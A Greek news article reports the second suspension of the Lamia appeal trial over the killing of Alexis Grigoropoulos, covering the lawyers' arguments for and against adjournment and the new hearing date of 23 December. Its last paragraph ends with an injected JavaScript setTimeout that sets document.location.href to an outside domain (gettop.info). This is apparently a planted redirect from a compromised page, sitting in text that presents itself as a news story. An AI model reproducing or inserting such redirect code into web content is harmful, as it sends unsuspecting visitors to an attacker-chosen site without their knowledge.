Νέα διακοπή στη δίκη για τη δολοφονία του Αλέξη Γρηγορόπουλου

0
8

 

Για δεύτερη φορά διεκόπη η δίκη για τη δολοφονία του Αλέξη Γρηγορόπουλου στο Μικτό Ορκωτό Εφετείο της Λαμίας, για την οποία εχουν καταδικαστεί οι αστυνομικοί Επαμεινώνδας Κορκονέας και Βασίλης Σαραλιώτης.

Το αίτημα της αναβολής κατέθεσε εκ μέρους της οικογένειας του Αλέξη Γρηγορόπουλου, ο συνήγορος Νίκος Κωνσταντόπουλος, ο οποίος έκανε ιδιαίτερη αναφορά στον πρόσφατο θάνατο -στις 18 Οκτωβρίου- του πατέρα τού Αλέξη Γρηγορόπουλου. Παράλληλα, επικαλέστηκε σοβαρά προβλήματα υγείας για τη μητέρα τού Αλέξη Γρηγορόπουλου και αδυναμία να προσέλθει να καταθέσει σ’ αυτήν τη φάση.

Ο συνήγορος υπεράσπισης του Κορκονέα, Αλέξης Κούγιας, ήταν αντίθετος στην αναβολή της υπόθεσης ζητώντας να επιταχυνθούν οι διαδικασίες για να αποδοθεί δικαιοσύνη, όπως είπε, καθώς ο πελάτης του παραμένει έγκλειστος στις φυλακές Δομοκού.

Από την πλευρά του ο συνήγορος υπεράσπισης του Β. Σαραλιώτη που έχει αποφυλακιστεί, Θ. Καραΐσκος, συνηγόρησε στο αίτημα του Νίκου Κωνσταντόπουλου για την αναβολή της υπόθεσης.

Το δικαστήριο απέρριψε το αίτημα της αναβολής, διέκοψε ωστόσο την εκδίκαση της υπόθεσης για τις 23 Δεκεμβρίου.

Έξω από το Εφετείο της Λαμίας είχαν αναπτυχθεί ισχυρές αστυνομικές δυνάμεις και είχαν ληφθεί αυστηρά μέτρα προστασίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here